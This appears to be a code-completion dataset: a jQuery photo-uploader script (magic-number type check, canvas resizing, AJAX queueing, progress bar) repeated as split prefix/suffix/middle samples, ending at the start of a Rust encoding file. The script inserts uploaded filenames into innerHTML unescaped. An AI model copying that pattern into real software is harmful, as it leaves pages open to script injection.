var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); | {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
} | conditional_block |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
}
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function | (file, index, length) {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
}
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button
$("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); | queuePhotos | identifier_name |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
}
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function queuePhotos(file, index, length) |
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button
$("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); | {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
} | identifier_body |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
}
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function queuePhotos(file, index, length) {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
}
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
| $("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); |
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button | random_line_split |
encode.rs | use std::fs;
use std::io::{Cursor};
use std::collections::HashMap;
use clap::ArgMatches;
use rand::{Rng, prelude::StdRng};
use bitstream_io::{BigEndian, BitReader};
use ngrams::Ngram;
use rpassword;
use super::utils;
/// Counts n-gram occurrences in `text` for every depth from `n` down to 1.
///
/// Returns `(hash, unique_words, total_words)` where `hash` maps each gram
